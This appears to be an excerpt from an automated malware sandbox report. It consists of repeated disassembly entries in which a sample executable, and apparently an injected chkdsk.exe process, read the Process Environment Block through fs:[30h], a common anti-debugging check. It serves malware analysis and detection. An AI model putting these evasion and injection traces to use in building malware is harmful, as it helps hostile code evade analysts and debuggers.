Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E03E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3E03E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E485BA5 mov eax, dword ptr fs:[00000030h] 18_2_1E485BA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EBC2C mov eax, dword ptr fs:[00000030h] 18_2_1E3EBC2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E002D mov eax, dword ptr fs:[00000030h] 18_2_1E3E002D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h] 18_2_1E44C450
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44C450 mov eax, dword ptr fs:[00000030h] 18_2_1E44C450
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h] 18_2_1E3CB02A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h] 18_2_1E3CB02A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h] 18_2_1E3CB02A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CB02A mov eax, dword ptr fs:[00000030h] 18_2_1E3CB02A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E472073 mov eax, dword ptr fs:[00000030h] 18_2_1E472073
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E481074 mov eax, dword ptr fs:[00000030h] 18_2_1E481074
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471C06 mov eax, dword ptr fs:[00000030h] 18_2_1E471C06
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h] 18_2_1E48740D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h] 18_2_1E48740D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48740D mov eax, dword ptr fs:[00000030h] 18_2_1E48740D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h] 18_2_1E436C0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h] 18_2_1E436C0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h] 18_2_1E436C0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436C0A mov eax, dword ptr fs:[00000030h] 18_2_1E436C0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D746D mov eax, dword ptr fs:[00000030h] 18_2_1E3D746D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h] 18_2_1E437016
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h] 18_2_1E437016
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437016 mov eax, dword ptr fs:[00000030h] 18_2_1E437016
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h] 18_2_1E484015
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E484015 mov eax, dword ptr fs:[00000030h] 18_2_1E484015
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h] 18_2_1E3D0050
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D0050 mov eax, dword ptr fs:[00000030h] 18_2_1E3D0050
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA44B mov eax, dword ptr fs:[00000030h] 18_2_1E3EA44B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EF0BF mov ecx, dword ptr fs:[00000030h] 18_2_1E3EF0BF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h] 18_2_1E3EF0BF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EF0BF mov eax, dword ptr fs:[00000030h] 18_2_1E3EF0BF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F90AF mov eax, dword ptr fs:[00000030h] 18_2_1E3F90AF
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov ecx, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44B8D0 mov eax, dword ptr fs:[00000030h] 18_2_1E44B8D0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488CD6 mov eax, dword ptr fs:[00000030h] 18_2_1E488CD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E20A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E20A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C849B mov eax, dword ptr fs:[00000030h] 18_2_1E3C849B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h] 18_2_1E436CF0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h] 18_2_1E436CF0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436CF0 mov eax, dword ptr fs:[00000030h] 18_2_1E436CF0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9080 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9080
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4714FB mov eax, dword ptr fs:[00000030h] 18_2_1E4714FB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h] 18_2_1E433884
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E433884 mov eax, dword ptr fs:[00000030h] 18_2_1E433884
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B58EC mov eax, dword ptr fs:[00000030h] 18_2_1E3B58EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E433540 mov eax, dword ptr fs:[00000030h] 18_2_1E433540
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h] 18_2_1E3E513A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E513A mov eax, dword ptr fs:[00000030h] 18_2_1E3E513A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h] 18_2_1E3E4D3B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h] 18_2_1E3E4D3B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4D3B mov eax, dword ptr fs:[00000030h] 18_2_1E3E4D3B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C3D34 mov eax, dword ptr fs:[00000030h] 18_2_1E3C3D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAD30 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAD30
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov eax, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D4120 mov ecx, dword ptr fs:[00000030h] 18_2_1E3D4120
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9100
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9100
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9100 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9100
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB171
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB171 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB171
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h] 18_2_1E3DC577
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DC577 mov eax, dword ptr fs:[00000030h] 18_2_1E3DC577
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC962 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC962
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D7D50 mov eax, dword ptr fs:[00000030h] 18_2_1E3D7D50
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E43A537 mov eax, dword ptr fs:[00000030h] 18_2_1E43A537
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h] 18_2_1E3DB944
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DB944 mov eax, dword ptr fs:[00000030h] 18_2_1E3DB944
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488D34 mov eax, dword ptr fs:[00000030h] 18_2_1E488D34
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F3D43 mov eax, dword ptr fs:[00000030h] 18_2_1E3F3D43
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47E539 mov eax, dword ptr fs:[00000030h] 18_2_1E47E539
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov ecx, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E436DC9 mov eax, dword ptr fs:[00000030h] 18_2_1E436DC9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h] 18_2_1E3E1DB5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h] 18_2_1E3E1DB5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E1DB5 mov eax, dword ptr fs:[00000030h] 18_2_1E3E1DB5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E61A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E61A0 mov eax, dword ptr fs:[00000030h] 18_2_1E3E61A0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E35A1 mov eax, dword ptr fs:[00000030h] 18_2_1E3E35A1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h] 18_2_1E3EFD9B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EFD9B mov eax, dword ptr fs:[00000030h] 18_2_1E3EFD9B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h] 18_2_1E47FDE2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h] 18_2_1E47FDE2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h] 18_2_1E47FDE2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47FDE2 mov eax, dword ptr fs:[00000030h] 18_2_1E47FDE2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4441E8 mov eax, dword ptr fs:[00000030h] 18_2_1E4441E8
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2990 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2990
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B2D8A mov eax, dword ptr fs:[00000030h] 18_2_1E3B2D8A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E468DF1 mov eax, dword ptr fs:[00000030h] 18_2_1E468DF1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA185 mov eax, dword ptr fs:[00000030h] 18_2_1E3EA185
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DC182 mov eax, dword ptr fs:[00000030h] 18_2_1E3DC182
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2581 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2581
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB1E1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB1E1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BB1E1 mov eax, dword ptr fs:[00000030h] 18_2_1E3BB1E1
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CD5E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CD5E0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CD5E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h] 18_2_1E4805AC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4805AC mov eax, dword ptr fs:[00000030h] 18_2_1E4805AC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4369A6 mov eax, dword ptr fs:[00000030h] 18_2_1E4369A6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h] 18_2_1E4351BE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h] 18_2_1E4351BE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h] 18_2_1E4351BE
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4351BE mov eax, dword ptr fs:[00000030h] 18_2_1E4351BE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054A3D43 mov eax, dword ptr fs:[00000030h] 31_2_054A3D43
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E3540 mov eax, dword ptr fs:[00000030h] 31_2_054E3540
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05513D40 mov eax, dword ptr fs:[00000030h] 31_2_05513D40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05487D50 mov eax, dword ptr fs:[00000030h] 31_2_05487D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h] 31_2_0548C577
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0548C577 mov eax, dword ptr fs:[00000030h] 31_2_0548C577
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05538D34 mov eax, dword ptr fs:[00000030h] 31_2_05538D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552E539 mov eax, dword ptr fs:[00000030h] 31_2_0552E539
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h] 31_2_05494D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h] 31_2_05494D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05494D3B mov eax, dword ptr fs:[00000030h] 31_2_05494D3B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05473D34 mov eax, dword ptr fs:[00000030h] 31_2_05473D34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0546AD30 mov eax, dword ptr fs:[00000030h] 31_2_0546AD30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054EA537 mov eax, dword ptr fs:[00000030h] 31_2_054EA537
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov ecx, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_054E6DC9 mov eax, dword ptr fs:[00000030h] 31_2_054E6DC9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05518DF1 mov eax, dword ptr fs:[00000030h] 31_2_05518DF1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h] 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0547D5E0 mov eax, dword ptr fs:[00000030h] 31_2_0547D5E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_0552FDE2 mov eax, dword ptr fs:[00000030h] 31_2_0552FDE2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 31_2_05492581 mov eax, dword ptr fs:[00000030h] 31_2_05492581
